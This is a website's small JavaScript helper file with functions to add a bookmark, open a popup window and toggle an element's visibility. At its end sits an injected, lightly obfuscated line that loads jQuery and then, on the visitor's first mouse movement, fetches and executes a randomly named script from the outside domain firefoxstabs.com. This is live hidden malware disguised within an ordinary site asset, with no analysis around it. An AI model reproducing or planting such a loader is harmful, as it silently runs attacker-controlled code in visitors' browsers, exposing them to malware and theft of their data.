function addfav() {
  window.external.AddFavorite(location.href, document.title);
  return;
}

function wop(FileName,Width,Height) { 
  Options="toolbar=no,scrollbars=no,directories=no,status=no,menubar=no,resizable=no,location=no,width="+Width+",height="+Height;
  s = Math.random(4000)+"";
  s = ""+s;
  s = s.substring(3,s.length);
  window.open(FileName,"FileName"+s+"",Options);
}

function openlayer(l) {
  if (!document.getElementById(l).style.display || document.getElementById(l).style.display == 'none') document.getElementById(l).style.display = "inline";
  else document.getElementById(l).style.display = 'none';
}

var RootPath = 'rootpath';
document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});
